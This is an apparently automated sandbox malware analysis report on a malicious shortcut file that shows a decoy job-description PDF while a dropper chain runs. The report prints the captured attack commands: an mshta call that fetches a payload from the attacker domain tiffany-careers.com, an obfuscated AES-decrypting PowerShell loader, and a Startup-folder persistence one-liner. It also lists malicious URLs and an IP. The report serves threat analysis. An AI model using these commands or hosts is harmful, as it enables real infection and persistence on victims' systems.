Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00007FF65605C7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605B7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560671F4 FindFirstFileW,FindClose,16_2_00007FF6560671F4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00007FF6560672A8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605BC70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00007FF65606A874
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A350
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656066428 FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF656066428
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A4F8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022F50 FindFirstFileExW,16_2_00007FF656022F50
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656001D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,16_2_00007FF656001D80
Source: wscript.exe, 0000001C.00000002.1974623401.00000208397C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 0000001C.00000002.1974623401.00000208397C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\p
Source: powershell.exe, 00000015.00000002.1926160809.00000217E34F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656070A00 BlockInput,16_2_00007FF656070A00
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00007FF655FE37B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656005BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,16_2_00007FF656005BC0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656077634 LoadLibraryA,GetProcAddress,16_2_00007FF656077634
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D780 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,16_2_00007FF65604D780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560057E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF6560057E4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560059C8 SetUnhandledExceptionFilter,16_2_00007FF6560059C8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF65601AF58
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656028FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF656028FE4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00007FF65604CE68
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00007FF655FE37B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656059420 SendInput,keybd_event,16_2_00007FF656059420
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605D158 mouse_event,16_2_00007FF65605D158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BnQwAP.exe "C:\Users\user\AppData\Roaming\BnQwAP.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,16_2_00007FF65604C858
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00007FF65604D540
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3087042834.000001DD4EC23000.00000004.00000800.00020000.00000000.sdmp, BnQwAP.exe, 00000010.00000000.1703721677.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BnQwAP.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601FD20 cpuid 16_2_00007FF65601FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601BEF8 GetSystemTimeAsFileTime,16_2_00007FF65601BEF8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656042BCF GetUserNameW,16_2_00007FF656042BCF
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,16_2_00007FF656022650
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656001D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,16_2_00007FF656001D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1813369831.00000217C9344000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920633471.00000217E32AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1926160809.00000217E3541000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1815232326.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1819991888.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1831064409.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1836228521.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1830489454.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1810953959.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1830342741.0000000001C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: BnQwAP.exe, 00000010.00000002.1753379248.00000295A1999000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920633471.00000217E32DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1926160809.00000217E3565000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vs}\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: BnQwAP.exeBinary or memory string: WIN_81
Source: BnQwAP.exeBinary or memory string: WIN_XP
Source: BnQwAP.exeBinary or memory string: WIN_XPe
Source: BnQwAP.exeBinary or memory string: WIN_VISTA
Source: BnQwAP.exe.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: BnQwAP.exeBinary or memory string: WIN_7
Source: BnQwAP.exeBinary or memory string: WIN_8
Source: Guard.exe.17.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656074074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00007FF656074074
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656073940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00007FF656073940
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 211 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 2 Disable or Modify Tools | 11 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 11 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Timestomp | NTDS | 38 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 DLL Side-Loading | LSA Secrets | 161 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 231 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1579656 Sample: lKin1m7Pf2.lnk Startdate: 23/12/2024 Architecture: WINDOWS Score: 100

Source | Detection | Scanner | Label | Link
lKin1m7Pf2.lnk | 26% | Virustotal | | Browse
lKin1m7Pf2.lnk | 21% | ReversingLabs | Shortcut.Trojan.Pantera |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Guard.exe | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1] | 39% | ReversingLabs | Win32.Dropper.Lumma |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | |
C:\Users\user\AppData\Roaming\BnQwAP.exe | 30% | ReversingLabs | Win64.Downloader.Generic |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.99 | true | false | | high
tiffany-careers.com | 147.45.49.155 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://tiffany-careers.com/Job_Description.pdf | true | | unknown
https://tiffany-careers.com/kfSlwlO | true | | unknown
https://tiffany-careers.com/jzuVDmQ.txt | true | | unknown
https://tiffany-careers.com/duychuan1 | true | | unknown
https://tiffany-careers.com/BnQwAP.exe | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
147.45.49.155 | tiffany-careers.com | Russian Federation | | 2895 | FREE-NET-ASFREEnetEU | false

IP
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579656
Start date and time:2024-12-23 07:06:49 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:30
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Sample name:lKin1m7Pf2.lnk
renamed because original name is a hash value
Original Sample Name:2ddf3f1022cce6aa5fd6c09b5275e47e.lnk
Detection:MAL
Classification:mal100.expl.evad.winLNK@45/62@4/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 49
• Number of non-executed functions: 247
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 217.20.58.99, 23.218.208.137, 162.159.61.3, 172.64.41.3, 18.213.11.84, 34.237.241.83, 54.224.241.105, 50.16.47.176, 23.195.39.65, 184.30.20.134, 23.32.238.137, 23.32.238.161, 2.19.198.65, 23.32.238.160, 23.32.238.155, 2.19.198.74, 2.19.198.42, 2.19.198.49, 2.19.198.66, 23.32.238.122, 23.32.238.96, 2.19.198.48, 2.19.198.40, 23.32.238.128, 20.12.23.50, 52.22.41.97, 13.107.246.63
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
• Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6200 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
01:07:48 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
01:07:54 | API Interceptor | 2x Sleep call for process: svchost.exe modified
01:07:55 | API Interceptor | 1x Sleep call for process: mshta.exe modified
01:07:56 | API Interceptor | 127x Sleep call for process: powershell.exe modified
01:08:18 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
01:08:31 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
01:09:03 | API Interceptor | 37x Sleep call for process: Guard.exe modified
01:09:21 | API Interceptor | 1x Sleep call for process: SwiftWrite.pif modified
07:08:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              bg.microsoft.map.fastly.netfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 199.232.214.172
                                                                                              #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                              • 199.232.214.172
                                                                                              #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                              • 199.232.214.172
                                                                                              Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                              • 199.232.210.172
                                                                                              HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                              • 199.232.210.172
                                                                                              1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                              • 199.232.210.172
                                                                                              1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                              • 199.232.214.172
                                                                                              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 217.20.58.100
                                                                                              uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                              • 217.20.58.99
                                                                                              data.exeGet hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.99
                                                                                              4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 217.20.58.99
                                                                                              gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.99
                                                                                              H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 84.201.212.68
                                                                                              H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 84.201.211.18
                                                                                              tiffany-careers.comR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
